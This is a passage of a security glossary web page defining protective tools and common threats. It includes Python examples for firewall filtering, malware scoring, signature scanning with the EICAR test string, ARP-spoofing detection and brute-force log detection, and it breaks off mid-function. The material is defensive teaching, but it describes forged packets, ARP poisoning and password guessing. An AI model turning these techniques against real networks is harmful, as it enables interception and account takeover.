
Security 101

Security Tools

 

2-Factor Authentication:  

 

Two independent factors required to access an account, application, or document.

Example – A password AND a text message code.

The password is something you know and the text message arrives on something you have, YOUR phone. Keep in mind that a password plus a security question, like your high school mascot, is NOT 2-Factor Authentication because both are something you know. The two factors must come from different categories: something you know (password, PIN), something you have (phone, hardware security key), something you are (think fingerprint or retina), or somewhere you are (location).

Passwords alone can be phished, leaked, or guessed, and 2-Factor Authentication is the single most effective upgrade for most accounts. Not all second factors are equal, though: a text message code can be intercepted or redirected by an attacker who takes over your phone number (SIM swapping), so an authenticator app or a hardware security key is the stronger choice where it is offered.

 

2-Step Verification:  

 

Similar to 2-Factor Authentication, this is a method of requiring an additional layer of access on top of a password. The difference is that 2-Step verification could be a second knowledge-based question (example – What street you grew up on). While better than relying on a password alone, it’s often best to go with 2-Factor for the best security.  

 

Anti-Theft: 

 

Think of Anti-Theft as a way to protect or retrieve devices after they’ve already been stolen. Some solutions may have loud alarms that prevent your phone or laptop from being taken, but most often these tools lock your photos, documents, and applications so they stay private.  

 

Some versions of Anti-Theft provide a find-my-device feature with a map and address or even use the camera as a way to spy on the new owner. Keep an eye out for software that allows for device wipe as a last measure to maintain privacy.  

 

Anti-Tracker: 

 

Often bundled with antivirus suites or browsers, this is a practical way to stay private online and cut down on advertising clutter. Anti-Trackers can work in a few different ways, but most often they block third-party tracking cookies and the tracking scripts and beacons that advertisers embed on pages, so your browsing activity cannot be stitched together across sites. This means not only that your history and activity are not being profiled (Hooray 4 Privacy), but you should also see fewer of those tailored webpage ads. Fewer ads usually means faster loading too! Keep in mind that blocking cookies does not stop browser fingerprinting, so an anti-tracker is one layer of privacy rather than anonymity.

 

Artificial Intelligence: 

 

This is one of the broader terms in security, but still highly important and constantly evolving. AI isn’t a single tool or product. It’s really more of a method where an application can learn, adapt, and act. This is often seen in machine learning or behavioral analysis, but there are many different tools that fall under AI. Here is an example of how AI keeps you safe.

  

Artificial Intelligence in an Antivirus solution looks at an email attachment and determines that, when opened, it will access sensitive documents and erase them. Even though the code in the file has never been seen before, the AI recognizes this behavior as malicious and determines it should block it, notify you, and then submit the file to the cloud for further analysis.

 

Behavioral / Anomaly Detection:   

 

A lot like the name implies, this Antivirus / Intrusion Prevention method looks at behavior characteristics to determine if something is malicious or not. By evaluating what a file, exploit, or application wants to do, even never before seen threats can be stopped preemptively. Here’s an example. 

 

You click on a new application to download. The code has never been seen or evaluated, but through behavioral analysis your Antivirus determines it wants to change administrative settings on your computer. This is an unusual behavior that deviates from the normal activity of an application and must be blocked. ‘Behavioral’ and ‘Anomaly’ are used interchangeably by some vendors and described as slightly different by others. Both evaluate behaviors, but they may differ in what stage of the attack a threat is blocked: behavioral rules match known-bad actions (disabling backups, encrypting many files in quick succession), while anomaly detection flags activity that deviates from a learned baseline even when it matches no known rule.

 

BitLocker: 

 

This tool comes standard with Windows (the Pro, Enterprise, and Education editions; Home editions get the more limited Device Encryption) and protects files, saved passwords, and everything else on the drive through full-volume encryption. The data on disk is always stored encrypted. When the PC boots, the volume is unlocked by the TPM chip (optionally together with a PIN or password you enter before Windows starts) and data is decrypted on the fly as it is read. Logging off does not re-encrypt anything, because nothing on disk was ever decrypted; what matters is that a drive pulled from a lost or stolen laptop cannot be read without the key. Keep the recovery key somewhere safe (Microsoft account, Active Directory, or printed), since without it a forgotten PIN or a hardware change can lock you out of your own data.

 

Cloud Management:  

 

Think of cloud management as a way to access security applications like antivirus from anywhere. Just as you would log into your bank account or social media from a browser, you can do the same to make sure your devices are protected through a number of different security features. Different solutions provide helpful features like device tracking, parental controls, or online tech support. All of this is made much simpler through cloud management.  

 

Cloud Scanning: 

 

Cloud scanning can mean different things to each security vendor. For antivirus solutions there are typically two common ways it is referenced. One way, is that the actual scanning function takes place in the cloud and not on your device. This means the scan uses far less memory and CPU so you can work without being slowed down too much.  

 

The second way is more about security. When an antivirus solution is connected to the cloud it is able to constantly receive updates on new threats, important patches, and can even submit files from your device for analysis.  

 

Cross-Platform Protection: 

 

Protecting the Windows PC or Mac you’re using can sometimes only be half the battle. Even if your device is safeguarded from threats specific to its own operating system (macOS or iOS, say), you likely still exchange files with different ones (Android, Windows, Linux). Cross-Platform Protection detects threats written for every supported operating system, so a Mac does not pass a Windows virus along unnoticed, whether it arrives over email, a file share, or more.

 

Data Loss Prevention: 

 

The idea is simple: keep sensitive data from being taken off of your device, maliciously or by accident. DLP solutions can work in a variety of ways, but most commonly they succeed by scanning for certain words, phrases, patterns (credit card or social security numbers), or classified files. Whether a threat actor is attempting to steal your financial records or an in-house worker is downloading product information for personal gain, Data Loss Prevention solutions watch a variety of channels (email, USB, network connections, cloud uploads) and immediately flag or block the transfer. Where some versions just prevent the data from being taken, others add a watermark over documents to discourage screenshots.

 

Device Control:  

 

There are two reasons you are most likely to use device control. The first, referred to as ‘writing’, is to keep sensitive data from leaving your device. This can be as simple as blocking all copies to removable media like USB drives (think Data Loss Prevention) or requiring that anything written to removable media be encrypted, in case the drive is lost or stolen. The second, ‘reading’, is to prevent malicious threats from harming your device.

This most commonly applies to blocking USB devices (thumb drives, smartphones, and more) from delivering malware directly onto your device. Device Control applications typically provide very simple rules that state when a device can / cannot interact with your machine, for example allowing only company-issued drives identified by vendor and serial number.

 

Disk Encryption: 

 

Also referred to as Full Disk Encryption, this is the process of converting everything on your hard drive into scrambled data that can only be read after unlocking it with a password, PIN, or a key held in hardware. Disk Encryption tools come standard with newer versions of Windows (BitLocker) and macOS (FileVault). Different Antivirus solutions may provide a disk encryption feature that helps you manage these tools. The benefits are often to show you are in compliance with certain data regulations and the ability to manage encryption (and escrow the recovery keys) of several devices from a single location. Note that disk encryption protects data at rest only: once the machine is booted and unlocked, malware running on it reads the same plaintext you do.

 

File Encryption:  

 

This can apply to a file that is at rest (sitting on your hard drive unused) or in transit (being sent in an email). File Encryption scrambles information into unreadable ciphertext until it is unlocked with a key. The most common and accepted form of encryption is AES. You may see different numbers like 128-bit or 256-bit following AES. These are different key sizes. The larger the number, the larger the key, and the more guesses a brute-force attack would need, though AES-128 is already far beyond any practical attack. In practice, encrypted files are far more often exposed by a weak password protecting the key, or a key stored next to the file, than by the key size.

 

Firewall: 

 

One of the more universally used terms in security, firewalls are a staple of protecting both devices and networks. One misconception about firewalls is that they are broad all-in-one tools that block, hunt, and eradicate any and all threats. That is only partly true: a firewall acts as a gate, allowing or blocking incoming and outgoing traffic according to rules (no connections from this IP, allow traffic only to this online application, stop access to social media sites). A Stateless firewall applies those rules to each packet on its own, looking only at the addresses and ports in that packet.

The other approach, Stateful, takes context into consideration. The firewall remembers which connections your device opened, so replies to your own requests are allowed back in while unsolicited inbound traffic is dropped, even when an attacker dresses a packet up to look like a reply. Both approaches are very common and work to keep sensitive information in and malicious network activity out. The takeaway, however, is that once something gets past the firewall (a malicious download you requested yourself, for instance) it’s up to antivirus and intrusion detection / prevention to stop it, unless your firewall has these additional features built in.
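To make the stateless / stateful distinction concrete, here is a small packet-filter simulation written for this page; it is an added example, not code from the original. The addresses, rules, and packets are all constructed (documentation address ranges; the protected host is assumed to be 10.0.0.5), and connection tracking is reduced to matching a reply against the 4-tuple of a connection the host opened.

```python
from dataclasses import dataclass

LOCAL = "10.0.0.5"    # the protected host's own address (assumed for the example)


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    syn: bool = False     # True on the first packet of a new TCP connection


def _matches(pkt: Packet, cond: dict) -> bool:
    return all(getattr(pkt, field) == value for field, value in cond.items())


def stateless_decide(pkt: Packet, rules) -> str:
    """Stateless filtering: each packet is judged on its own header fields; first matching rule wins."""
    for verdict, cond in rules:
        if _matches(pkt, cond):
            return verdict
    return "deny"


# Rule set 1: allow inbound SSH, allow everything we send, deny the rest. Replies to our own
# web browsing are blocked, because nothing remembers that we asked for them.
STRICT_RULES = [
    ("allow", {"dst_ip": LOCAL, "dst_port": 22}),
    ("allow", {"src_ip": LOCAL}),
    ("deny", {}),
]

# Rule set 2: the usual stateless "fix": let in anything whose source port is 443 so HTTPS
# replies get through. An attacker can simply send from port 443.
LEAKY_RULES = STRICT_RULES[:2] + [("allow", {"dst_ip": LOCAL, "src_port": 443}), ("deny", {})]


class StatefulFirewall:
    """Tracks connections the protected host opened, so only genuine replies get back in."""

    def __init__(self, published_ports=(22,)):
        self.published_ports = set(published_ports)
        self.connections = set()      # (local_ip, local_port, remote_ip, remote_port)

    def decide(self, pkt: Packet) -> str:
        if pkt.src_ip == LOCAL:
            # Outbound: remember the 4-tuple so the reply is recognised as ESTABLISHED.
            self.connections.add((pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port))
            return "allow"
        if (pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port) in self.connections:
            return "allow"            # reply to a connection we initiated
        if pkt.syn and pkt.dst_port in self.published_ports:
            self.connections.add((pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port))
            return "allow"            # NEW inbound connection to a service we deliberately expose
        return "deny"                 # unsolicited inbound, whatever ports it claims


def demo() -> dict:
    """Run the same packets through each approach; returns the verdicts keyed by packet name."""
    outbound = Packet(LOCAL, 51000, "198.51.100.7", 443, syn=True)   # our HTTPS request
    reply = Packet("198.51.100.7", 443, LOCAL, 51000)                # the server's answer
    forged = Packet("203.0.113.9", 443, LOCAL, 51000)                # attacker, source port 443
    fw = StatefulFirewall()
    return {
        "strict": {"reply": stateless_decide(reply, STRICT_RULES),
                   "forged": stateless_decide(forged, STRICT_RULES)},
        "leaky": {"reply": stateless_decide(reply, LEAKY_RULES),
                  "forged": stateless_decide(forged, LEAKY_RULES)},
        "stateful": {"outbound": fw.decide(outbound), "reply": fw.decide(reply),
                     "forged": fw.decide(forged)},
    }
```

A real stateful filter (Linux conntrack behind iptables or nftables, the Windows Defender Firewall) also checks TCP flags and sequence numbers and times idle entries out, but the principle is the one above: the ‘leaky’ rule set is what you are forced into without state, and it is exactly the hole a scanner sending from source port 443 (or 53) walks through.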

 

Heuristic Analysis: 

 

This term is often used loosely by different Antivirus solutions. Like Behavior Analysis, Heuristic Analysis evaluates the actions a file or download is likely to take. The difference is that Behavior Analysis looks at the actual execution as it happens. Heuristic Analysis, on the other hand, looks at the way the code is constructed before it runs and compares it to previously seen malware (a bit like machine learning, covered below). It also evaluates instructions within the code (calls that disable security settings, write to startup locations, or decrypt themselves in memory) and weighs how risky the combination is. The important part is that whether or not a file has been seen before, Heuristic Analysis can estimate what it wants to accomplish by the way it is designed, at the cost of occasional false positives on unusual but legitimate software.

 

Host Intrusion Prevention: 

 

Like Antivirus, Host Intrusion Prevention Systems (HIPS) look for malicious activity and attempt to block and eradicate it. Some slight differences are that HIPS watch a larger area: network connections, running processes, memory, and the computer’s core (known as the kernel), and they can enforce rules about what a process may do (no writing to startup locations, no injecting into other processes) rather than only judging files. Depending on the solution, HIPS may also have additional remediation tools beyond just block and quarantine. Today, these features can also be found in some newer, Next-Gen, Antivirus solutions even if the term Host Intrusion Prevention is not explicitly mentioned.

 

Link Scanning:  

 

A tool to verify if a link leads to a safe or malicious URL. Some Antivirus solutions allow you to simply hover over a link and see if the destination is trustworthy. 

 

Log Files:  

 

An overview of activity on your device. Different log files can show network activity, applications in use, or processes occurring. Think of these as historical records or evidence of what’s occurred on your device.

 

Machine Learning: 

 

An algorithm that estimates, from past examples, the likely outcome of running a file, application, or more. Machine Learning is most commonly used by training a model on a large labeled collection of events, signatures, malware, trusted files, and more. When an Antivirus solution evaluates something with Machine Learning it extracts the same kinds of features from the new sample and lets the model score how closely it resembles the malicious versus the trusted examples it was trained on.

Here’s an oversimplified example. An antivirus company builds up analytics over three years. They see that 75% of files with the signature (code string) ‘525402C2B…’ will attempt to change administrative settings on a computer (not good). The same company also sees that 75% of files that attempt to load Java will try to create a backdoor on the device (also not good). So, when a file is downloaded and Antivirus sees it has the signature 525402C2B AND ALSO wants to load Java, Machine Learning combines the two signals: each alone is suspicious, and together they push the model’s probability of the file being malicious well above 75%, past the threshold at which it blocks. (The exact figure depends on the model and on how the training data was collected.)

You may see Antivirus companies discussing how many billions of events they track daily in the cloud. The reason this is important is because this is often the information that is fed into their machine learning models. The more (and the better labeled) the training data, the stronger the model, though every model still produces some false positives and can be evaded by samples crafted to look benign.
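To show the ‘combine several weak signals’ idea with actual arithmetic, here is a naive Bayes scorer over a constructed training set; it is an added example, not the page’s or any vendor’s model. The feature names follow the scenario above (a file that changes administrative settings, a file that loads Java) plus two others, and the eight training rows are made up so the numbers are easy to follow; nothing here reflects real prevalence data.

```python
import math
from collections import Counter

FEATURES = ("modifies_admin_settings", "loads_java", "packed", "code_signed")

# Constructed labelled training rows (features observed, label). A vendor would have millions
# of these from its telemetry; eight are enough to see how the arithmetic behaves.
TRAINING = [
    ({"modifies_admin_settings", "loads_java", "packed"}, "malicious"),
    ({"modifies_admin_settings", "packed"}, "malicious"),
    ({"loads_java"}, "malicious"),
    ({"modifies_admin_settings", "loads_java"}, "malicious"),
    ({"code_signed"}, "benign"),
    ({"code_signed", "loads_java"}, "benign"),
    (set(), "benign"),
    ({"modifies_admin_settings", "code_signed"}, "benign"),
]


class NaiveBayesScorer:
    """Bernoulli naive Bayes: each feature contributes independent evidence for or against 'malicious'."""

    def __init__(self, rows, features=FEATURES, smoothing=1.0):
        self.features = features
        self.smoothing = smoothing          # Laplace smoothing: never assign probability 0 to a feature
        self.class_count = Counter(label for _, label in rows)
        self.feat_count = {label: Counter() for label in self.class_count}
        for feats, label in rows:
            self.feat_count[label].update(f for f in feats if f in features)

    def feature_prob(self, feature, label):
        """P(feature present | label), smoothed."""
        n = self.class_count[label]
        return (self.feat_count[label][feature] + self.smoothing) / (n + 2 * self.smoothing)

    def _log_score(self, feats, label):
        total = math.log(self.class_count[label] / sum(self.class_count.values()))   # log prior
        for f in self.features:
            p = self.feature_prob(f, label)
            total += math.log(p if f in feats else 1 - p)   # absent features are evidence too
        return total

    def p_malicious(self, feats):
        """Posterior probability that a sample with these features is malicious."""
        lm, lb = self._log_score(feats, "malicious"), self._log_score(feats, "benign")
        return 1.0 / (1.0 + math.exp(lb - lm))

    def verdict(self, feats, threshold=0.8):
        return "block" if self.p_malicious(feats) >= threshold else "allow"


def demo() -> dict:
    """Score the page's scenario: the suspicious signature alone, Java alone, both, and a signed file."""
    model = NaiveBayesScorer(TRAINING)
    cases = {
        "admin_only": {"modifies_admin_settings"},
        "java_only": {"loads_java"},
        "admin_and_java": {"modifies_admin_settings", "loads_java"},
        "signed_only": {"code_signed"},
    }
    return {name: round(model.p_malicious(f), 3) for name, f in cases.items()}
```

With this training data, either clue alone scores 0.6 and both together 0.857, while a code-signed file with neither scores 0.036. Three caveats a practitioner would add: the score depends entirely on how representative the training data is, the threshold sets the trade-off between missed malware and false positives, and an attacker who knows which features matter can remove them (sign the file, avoid the Java loader) to push the score back under the line.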

 

Memory Scanner: 

 

Some viruses do not reside in a hard drive, but live only in short term memory (RAM). Often, when a computer conducts a virus scan it looks at files and determines if they are malicious. If a virus uses a running computing process and does not install fully onto your device it is much harder to detect. Memory scanners (often with the help of Behavioral Analysis) are able to catch what are called fileless attacks as they execute.

 

On Demand Scanning: 

 

The ability to scan a device at any time. Most Antivirus solutions offer quick scans that search common file locations, running processes, and startup entries. Full system scans are more in depth and search things like boot sectors, the registry, and every file on every local disk (where more complex viruses may hide). They take more time and resources, but can be much more effective.

 

Patch Update: 

 

The process of fixing vulnerabilities and updating software. It’s important to stay up to date on patches, as most often they are released to close vulnerabilities that attackers are actively trying to exploit. Once a patch is public, attackers study it to work out what it fixed, so the window between a patch being released and the matching exploit circulating can be a matter of days.

 

Port Scanning:  

 

When done through Antivirus or a network tool, this is an easy way to see which ports on your device are open, that is, which services are listening for connections from the network. Port Scanning does not show the data being sent or received, but it reveals what is reachable (a file share, a remote desktop service, a web server you forgot about) so you can close what you do not need. You may hear Port Scanning mentioned in a negative way, as threat actors run the same scans to map networks before attacking them. The best defense here is a good offense: understand your own network’s exposed services before they do.

 

Quarantine: 

 

A safe location to hold malware and suspected viruses before they are either restored (if they turn out to be false positives) or permanently deleted. Most Antivirus solutions will quarantine a file that appears malicious by moving it out of its current location, stripping its execute permission or encoding it, so no further harm can be done. Some solut1ions may send additional information to the cloud for further analysis before taking next steps.

 

Real-Time Protection:  

 

Blocking malicious threats, the moment they are detected. Think of Real-Time protection like an automated Antivirus scan that is always working. If a file, email, application, or more is started, Real-Time protection will evaluate it and alert you of any potential threats. On-demand scanning is still a good resource to consistently review files or drives, but Real-Time protection is an extremely helpful first line of defense that works on your behalf.  

 

Remote Device Wipe:  

 

If your device is lost or stolen and you want to ensure sensitive information cannot be seen, Remote Device Wipe will allow you to erase the entire drive. This feature is most often accessible from a cloud management console on a different desktop or mobile device. (It’s helpful to have your device’s data backed up to the cloud beforehand).   

 

Removeable Media Scanning: 

 

On-demand or real-time scanning of CDs, DVDs, USB drives, or even mobile devices. (Fun fact: in studies where USB drives were deliberately dropped around a campus, close to half were plugged in by whoever found them, out of sheer curiosity. We’d strongly recommend not doing this.)

 

Sandbox: 

 

A safe, isolated environment (typically a virtual machine that is thrown away afterwards) to test files, malware samples, and applications. Sandboxes work by letting a program run as intended to see what it wants to accomplish and how threatening it is. Keep in mind that some malware checks whether it is in a sandbox (no mouse movement, too little RAM, known virtual-machine drivers) and stays quiet until it reaches a real machine.

 

Security Policies:  

 

While this can be a vague term, when referenced with Antivirus solutions it often means having different rules for content, applications, and more based on a specific device or user. 

 

Signature Analysis: 

 

Comparing files to a repository of known threats (think of this like looking up a mugshot). When a sequence of bytes (known as a signature) matches a previously seen piece of malware, Signature Analysis knows to block the download or action. This is one of the most common forms of virus protection, but it’s important to pair it with Machine Learning, Heuristic Analysis, or Behavior Analysis to prevent unknown (zero-day) threats.  
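A minimal signature scanner, as an added example that is not code from the original page or any vendor. It matches files against a table of byte patterns and a table of SHA-256 hashes. The only byte pattern is the EICAR test string, the industry-standard harmless file that every engine is expected to detect; the hash entry is computed from constructed bytes standing in for a real sample. It also includes the simplest possible version of the Quarantine step described above.

```python
import hashlib
import os
import shutil
import tempfile

# Byte-pattern signatures. EICAR is the industry-standard harmless test string that every
# antivirus engine is expected to detect; it is not malware.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
BYTE_SIGNATURES = {"EICAR-Test-File": EICAR}

# Hash signatures: exact matches on a whole file. The 'sample' is constructed bytes, not real
# malware; in a product this table is filled from the vendor's threat feed.
KNOWN_BAD_SAMPLE = b"MZ\x90\x00constructed dropper, stands in for a real sample"
HASH_SIGNATURES = {hashlib.sha256(KNOWN_BAD_SAMPLE).hexdigest(): "Constructed.Dropper.A"}


def scan_bytes(data: bytes) -> list:
    """Match a blob in memory against both signature tables."""
    hits = [name for name, pattern in BYTE_SIGNATURES.items() if pattern in data]
    family = HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())
    if family:
        hits.append(family)
    return sorted(hits)


def scan_file(path: str, chunk_size: int = 1 << 20) -> list:
    """Stream a file in chunks (large files never sit in memory at once), keeping an overlap of
    len(longest pattern) - 1 bytes between chunks so a pattern straddling a boundary is still found."""
    overlap = max(len(p) for p in BYTE_SIGNATURES.values()) - 1
    digest = hashlib.sha256()
    hits = set()
    tail = b""
    with open(path, "rb") as f:
        while True:
            chunk = f.read(chunk_size)
            if not chunk:
                break
            digest.update(chunk)
            window = tail + chunk
            hits.update(name for name, pat in BYTE_SIGNATURES.items() if pat in window)
            tail = window[-overlap:] if overlap else b""
    family = HASH_SIGNATURES.get(digest.hexdigest())
    if family:
        hits.add(family)
    return sorted(hits)


def quarantine(path: str, qdir: str) -> str:
    """Move a detected file out of place, rename it by hash, and drop its execute bit so it cannot run."""
    os.makedirs(qdir, mode=0o700, exist_ok=True)
    with open(path, "rb") as f:
        name = hashlib.sha256(f.read()).hexdigest() + ".quar"
    dest = os.path.join(qdir, name)
    shutil.move(path, dest)
    os.chmod(dest, 0o400)
    return dest


def demo(tmpdir: str = None) -> dict:
    """Write three constructed files, scan each, and quarantine any that hit. Returns name -> hits."""
    tmpdir = tmpdir or tempfile.mkdtemp()
    samples = {
        "clean.txt": b"quarterly report, nothing to see here",
        "test.com": b"A" * 3040 + EICAR + b"B" * 10,     # EICAR placed across a 1024-byte chunk edge
        "dropper.bin": KNOWN_BAD_SAMPLE,
    }
    results = {}
    for name, content in samples.items():
        path = os.path.join(tmpdir, name)
        with open(path, "wb") as f:
            f.write(content)
        results[name] = scan_file(path, chunk_size=1024)
        if results[name]:
            quarantine(path, os.path.join(tmpdir, "quarantine"))
    return results
```

One changed byte is enough to defeat this kind of matching (scan_bytes(EICAR.replace(b"EICAR", b"EICAS")) returns nothing), and the hash of a recompiled or packed sample never matches, which is why signatures are paired with heuristics, behavior analysis, and machine learning rather than relied on alone.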

 

Threat Feed: 

 

A constantly growing collection of security events. Security applications like Antivirus and Anti-Malware use threat feeds from the cloud to provide devices with new updates on malicious behaviors, signatures, machine learning data, and more. A threat feed is often gathered from millions of devices and can include everything from strange behaviors, IP addresses, or information about potential targets.

 

Here’s an oversimplified example of a threat feed. A computer in California is attacked by an unknown threat. The signature of that threat is fed to the cloud. A device in Florida connected to that cloud receives an update to now block that signature.  

 

UEFI Scanner:  

 

A scan of a device’s firmware (the UEFI code that runs before the operating system loads). This particular scan is helpful to find and eradicate firmware-level rootkits, sometimes called bootkits, which take hold during bootup before the operating system and antivirus are running, and therefore survive a reinstall of Windows.

 

URL / Web Filtering:  

 

Preventing access to certain websites through rules you set up. These can be specific to a single domain name or often by general content categories (Adult, gambling, social media, etc.). Certain security tools will work on your behalf to block malicious URLs if they are deemed fraudulent or untrustworthy. 

 

VPN (Virtual Private Network):  

 

A Virtual Private Network is a way to connect a remote device to a network and secure all communication between the two. Think of it like this. When two laptops are on the same office network they can reach each other’s shared resources directly, without that traffic crossing the public internet. A VPN recreates that connection for a device elsewhere by wrapping its traffic in an encrypted tunnel to the network’s VPN endpoint, so anyone in between (the coffee shop’s Wi-Fi, your ISP) sees only encrypted data. This is a helpful and secure way to reach business systems from the road, or to use public Wi-Fi for something sensitive like logging into a bank account. Keep in mind the protection ends at the VPN endpoint: traffic beyond it is only as private as the VPN provider and the site you are visiting make it.

 

Web Certificate Checker:  

 

Take a look at the lock symbol next to Outlinesoftware.com. This symbol means the site presented a certificate issued by a Certificate Authority your browser trusts, proving that whoever runs the site controls that domain name, and that the connection is encrypted so information you send / receive cannot be read or altered in transit. What it does NOT certify is that the site itself is honest: phishing sites routinely obtain valid certificates, so a lock next to 0utlinesoftware.com proves only that you are securely connected to 0utlinesoftware.com. Check the name, not just the lock. A website that does not have a valid certificate may not provide a secure connection, and your browser will warn you before loading it.

 

Threats

 

Advanced Persistent Threats:  

 

A complex threat that remains hidden for an extended period (often months) and steals data without being seen. Advanced Persistent Threats are run by well-financed groups such as nation states and organized cyber criminals. The main goal is typically not to set off alarms by causing visible harm, but to keep expanding access by harvesting additional credentials and moving from one device to another (see Lateral Movement). APTs work in several stages: reconnaissance of the target organization and its people, initial access most often through phishing and social engineering, then persistence, privilege escalation, and slow, quiet data theft.

 

Adware:  

 

Advertisements that come as a pre-installed application on a device or pop up during browsing. Adware often draws on your cookies and online activity to decide what to show you. It can either be in the form of annoying popups or sometimes malicious links with hidden downloads.

 

ARP Poisoning:  

 

Every network interface has a MAC address, a 48-bit hardware identifier written as 12 hexadecimal digits (for example 00:1a:2b:3c:4d:5e). Think of this like a serial number for the network card; unlike an IP address it is not meant to change, although an attacker can easily spoof it. On a local network, devices find each other by MAC address, and every device, including your router, keeps an ARP table that maps the IP addresses it has talked to onto the MAC addresses that answered for them. When you send to an IP address on your network you are really handing the packet to a specific MAC address, and ARP is how your device learned which one.

ARP Poisoning attacks work by sending forged ARP replies so that a victim’s ARP table maps an IP address to the attacker’s MAC address instead of the real one. Example – You attempt to send a sensitive email. The email has to go through your router to reach the internet, but because of ARP poisoning the MAC address your laptop associates with the router actually belongs to an attacker on your network. The attacker receives the email, and usually forwards it on to the real router so nothing looks wrong, while reading or altering everything in between (a man-in-the-middle). End-to-end encryption (TLS, a VPN) keeps the contents private even when traffic is diverted this way.
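How ARP poisoning shows up on the wire, and how a host-side watcher catches it, as an added example that is not part of the original page. The ARP replies are a constructed sequence (private addresses and made-up MACs), the gateway address and its pinned MAC are assumed, and the detection logic is the one tools like arpwatch implement: remember who answered for each IP, and alert when the answer changes or when one MAC starts answering for several IPs.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "aa:bb:cc:00:00:01"       # the router's real address, pinned by the administrator (assumed)

# Constructed ARP replies observed on the LAN: (seconds since start, sender IP, sender MAC).
ARP_REPLIES = [
    (0, "192.168.1.1", "AA:BB:CC:00:00:01"),     # the real router announces itself
    (1, "192.168.1.20", "de:ad:be:ef:00:20"),    # attacker's laptop, behaving normally so far
    (2, "192.168.1.30", "aa:bb:cc:00:00:30"),    # victim's laptop
    (60, "192.168.1.1", "de:ad:be:ef:00:20"),    # attacker claims the router's IP ...
    (61, "192.168.1.30", "de:ad:be:ef:00:20"),   # ... and the victim's, to sit in both directions
]


class ArpWatch:
    """Keeps its own IP -> MAC table and reports the changes that ARP poisoning produces."""

    def __init__(self, pinned=None):
        self.pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
        self.table = {}                      # ip -> last MAC that answered for it
        self.claims = defaultdict(set)       # mac -> set of IPs it has answered for

    def observe(self, ts, ip, mac):
        """Process one ARP reply; returns a list of alert tuples (possibly empty)."""
        mac = mac.lower()
        alerts = []
        prev = self.table.get(ip)
        if self.pinned.get(ip, mac) != mac:
            alerts.append((ts, "pinned_mismatch", ip, self.pinned[ip], mac))
        elif prev is not None and prev != mac:
            alerts.append((ts, "changed", ip, prev, mac))
        self.table[ip] = mac
        self.claims[mac].add(ip)
        if len(self.claims[mac]) > 1:
            alerts.append((ts, "one_mac_many_ips", mac, tuple(sorted(self.claims[mac]))))
        return alerts


def run(replies=ARP_REPLIES, pinned=None):
    """Feed a reply sequence through the watcher; returns every alert in order."""
    watch = ArpWatch(pinned if pinned is not None else {GATEWAY_IP: GATEWAY_MAC})
    alerts = []
    for reply in replies:
        alerts.extend(watch.observe(*reply))
    return alerts


if __name__ == "__main__":
    for alert in run():
        print(alert)
```

On the defensive side, a static ARP entry for the gateway (on Linux, an `ip neigh` entry with nud permanent; on Windows, `arp -s`) stops the poisoning for that one host, and Dynamic ARP Inspection on managed switches stops it for the whole segment. Either way the real protection for the email in the example is TLS, which the attacker can divert but not read.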

 

Auto Dialers:  

 

Malware that silently places calls or sends messages from your device to premium-rate numbers, running up charges that the attacker collects a share of. Originally these hijacked dial-up modems; on smartphones the same trick is done by apps that call or text premium numbers without your consent. (Not to be confused with legitimate auto-dialer software used by sales organizations.)

 

Botnet:  

 

A collection of compromised computers (bots, or zombies) whose owners usually do not know they are infected, controlled remotely by an attacker and used together. There are two ways a Botnet can affect you. If you are on the receiving end of an attack, thousands of bots flood your device, router, or servers with traffic until all available bandwidth or capacity is used up. This will make it impossible to use the affected services until the attack is over (think Denial of Service). The other way is if your own device is recruited as a bot. Besides taking part in attacks on others, it may be used to send spam, mine cryptocurrency, or try stolen passwords against other sites, and it will eat up your computer’s resources for as long as the attacker has control.

 

Brute Force:  

 

A Brute Force attack is an attempt to guess a password by trying every possible combination or, more commonly, by trying lists of the most popular passwords first. Given enough time and attempts a Brute Force attack will eventually succeed, so the defense is to make enough attempts impossible: lock or slow down the account after a handful of incorrect attempts, rate-limit by source address, require long passwords (each extra character multiplies the work), and add 2-Factor Authentication so a guessed password alone is not enough. Online guessing also leaves a trail of failed logins, which makes it one of the easiest attacks to spot in log files.
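What a brute-force attempt looks like in the log files, and what a lockout policy does about it, as an added example that is not part of the original page. It also illustrates the Log Files and Behavioral / Anomaly Detection entries above. The log lines are constructed in a simplified sshd format (not captured from a real machine), and the thresholds (five failures in a minute, a fifteen-minute lock) are assumed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed auth-log lines in a simplified sshd style (not captured from a real host).
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd[1201]: Failed password for root from 203.0.113.9 port 51234 ssh2
2024-05-01T10:00:03 sshd[1201]: Failed password for root from 203.0.113.9 port 51236 ssh2
2024-05-01T10:00:05 sshd[1201]: Failed password for admin from 203.0.113.9 port 51240 ssh2
2024-05-01T10:00:07 sshd[1201]: Failed password for root from 203.0.113.9 port 51244 ssh2
2024-05-01T10:00:09 sshd[1201]: Failed password for root from 203.0.113.9 port 51250 ssh2
2024-05-01T10:00:11 sshd[1201]: Failed password for root from 203.0.113.9 port 51252 ssh2
2024-05-01T10:00:40 sshd[1201]: Accepted password for root from 203.0.113.9 port 51300 ssh2
2024-05-01T10:05:00 sshd[1340]: Failed password for alice from 198.51.100.7 port 40022 ssh2
2024-05-01T10:05:20 sshd[1340]: Accepted password for alice from 198.51.100.7 port 40022 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Accepted|Failed) password for "
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_auth_line(line: str):
    """Turn one log line into an event dict, or None for lines in another format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "ok": m["result"] == "Accepted",
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text: str, threshold: int = 5, window: timedelta = timedelta(seconds=60)):
    """Flag a source IP once it produces `threshold` failures inside a sliding `window`, and flag any
    later success from a flagged IP (the sign that a guess landed). Returns alerts in log order."""
    recent = defaultdict(deque)          # ip -> timestamps of failures still inside the window
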